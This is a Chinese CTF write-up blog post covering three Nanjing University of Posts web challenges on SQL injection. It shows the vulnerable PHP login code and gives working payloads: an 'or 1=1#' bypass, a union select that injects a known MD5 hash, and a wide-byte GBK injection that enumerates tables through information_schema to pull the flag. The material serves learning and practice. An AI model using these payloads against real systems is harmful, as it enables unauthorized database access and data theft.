【Web-南邮CTF】Web-CTF入门第6天

liebian365 2024-11-20 18:25 16 浏览 0 评论

【黑客笔记--7天入门南邮CTF-WEB篇】

SQL注入

查看页面源代码有下面的提示信息

先看clean函数做了什么直接干掉了引号啊 \' ==> '

function clean($str){
	if(get_magic_quotes_gpc()){
		$str=stripslashes($str);
	}
	return htmlentities($str, ENT_QUOTES);
}

$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);

$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
	die('Invalid password!');
}

echo $flag;

分析一下SQL语句一般来说注入的思路就是#截断SQL语句的password字段

'SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';'

展开看是下面这样的结构

SELECT * FROM users WHERE name=

\' $username \'

AND pass=

\' $password \';

看看代码靠闭合' 的思路是行不通了为什么呢?因为\'会被转义思路就是如何打破\'的束缚方案就是干掉username后面的\' 让一个AND结构变成OR 结构结果如下

SELECT * FROM users WHERE name=

\' admin\ \'

AND pass=

\' or 1=1# \';

SQL注入第2题

提示考察union的用法要求输入的user和pass要和数据库中的相同才算通过靠猜是不可能的那么直接通过POST请求体中输入的user打乱SQL语句吧

<?php
if($_POST[user] && $_POST[pass]) {
  mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = $_POST[user];
  $pass = md5($_POST[pass]);
  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
  if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
      echo "<p>Logged in! Key: ntcf{**************} </p>";
  }
  else {
    echo("<p>Log in failure!</p>");
  }
}
?>

首先我们拿到pass=hackbiji的md5也就是add0ca38fedfc9e173d676deeca7e0e7

root@gt:~/Codes# php 8.php 
add0ca38fedfc9e173d676deeca7e0e7
root@gt:~/Codes# cat 8.php
<?php
$pass = 'hackbiji';
echo md5($pass)."\n";
?>

原始SQL语句 "select pw from ctf where user='$user'"

输入

user = -1' union select 'add0ca38fedfc9e173d676deeca7e0e7'# 或者

-1' union select 'add0ca38fedfc9e173d676deeca7e0e7

pass = hackbiji

最终的效果如下

select pw from ctf where user=' -1' union select 'add0ca38fedfc9e173d676deeca7e0e7'

宽字节注入

SQL注入经常使用'闭合SQL语句如下测试我们发现'被转义成\' 我们需要吃掉\

在我的【前端黑客】XSS入门文章中有介绍宽字节问题

爆破数据库名:

id=%ef%27%20union%20select%201,database()%23

your sql:select id,title from news where id = '颸' union select 1,database()#'

拿到结果:sae-chinalover 对应16进制:0x7361652d6368696e616c6f766572

爆破数据库sae-chinalover的所有表名:

id=%ef%27%20union%20select%20group_concat(table_name),group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7361652d6368696e616c6f766572%23

your sql:select id,title from news where id = '颸' union select group_concat(table_name),group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572#'

拿到结果:ctf,ctf2,ctf3,ctf4,news

对应的16进制:0x637466 0x63746632 0x63746633 0x63746634 0x6e657773

爆破表ctf4的所有列名:

id=%ef%27%20union%20select%20group_concat(column_name),group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x63746634%23

your sql:select id,title from news where id = '颸' union select group_concat(column_name),group_concat(column_name) from information_schema.columns where table_name=0x63746634#'

拿到结果:id,flag

爆破表ctf4的flag列的数据

id=%ef%27%20union%20select%20flag,flag%20from%20ctf4%23

your sql:select id,title from news where id = '颸' union select flag,flag from ctf4#'

拿到结果:nctf{gbk_3sqli}

strcasestr

上一篇：Redis源码剖析之AOF
下一篇：PostgreSQL技术内幕19:逻辑备份工具pg_dump、pg_dumpall

【Web-南邮CTF】Web-CTF入门第6天

【黑客笔记--7天入门南邮CTF-WEB篇】

SQL注入

SQL注入第2题

宽字节注入

相关推荐

取消回复欢迎你发表评论:

一个小时多点，完成scrapy爬取官方网站新房的数据，50块到手

C语言char同时读取多个输入字符并打印

爬虫项目:实现京东全网爬虫京东爬虫跳过登录页

C语言总结_格式化打印函数、字符串、运算符

信息系统安全:软件系统安全

嵌入式开发C语言编程的那些编程思路与技巧

volatile很难?由浅入深怼到CPU汇编，彻底搞清楚它的底层原理

volatile详解

民间石子棋玩法，摆方，简单好学，你会吗?

Python玩转Excel，使用Python读取Excel文件如此简单!

【Web-南邮CTF】Web-CTF入门第6天

【黑客笔记--7天入门南邮CTF-WEB篇】

SQL注入

SQL注入第2题

宽字节注入

相关推荐

取消回复欢迎 你 发表评论:

一个小时多点，完成scrapy爬取官方网站新房的数据，50块到手

C语言char同时读取多个输入字符并打印

爬虫项目:实现京东全网爬虫 京东爬虫跳过登录页

C语言总结_格式化打印函数、字符串、运算符

信息系统安全:软件系统安全

嵌入式开发C语言编程的那些编程思路与技巧

volatile很难?由浅入深怼到CPU汇编，彻底搞清楚它的底层原理

volatile详解

民间石子棋玩法，摆方，简单好学，你会吗?

Python玩转Excel，使用Python读取Excel文件如此简单!

取消回复欢迎你发表评论:

爬虫项目:实现京东全网爬虫京东爬虫跳过登录页